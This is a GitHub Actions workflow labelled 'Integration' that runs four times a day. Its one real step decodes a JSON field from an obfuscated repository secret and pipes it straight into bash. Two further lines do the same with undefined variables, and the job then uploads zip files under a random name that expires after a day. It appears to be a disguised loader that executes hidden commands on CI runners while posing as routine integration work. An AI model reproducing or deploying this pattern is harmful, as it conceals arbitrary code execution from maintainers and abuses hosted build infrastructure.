name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '30 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          fq0838: ${{ secrets.fq0838 }}
        run: |
          printf '%s' "$fq0838" | jq -r .y298 | /bin/bash
          echo $do32525 | jq -r .aqx07 | /bin/bash
          printf '%s' "$pld68" | jq -r .kefq601 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 9w7zEJ24
          path: "*.zip"
          retention-days: 1
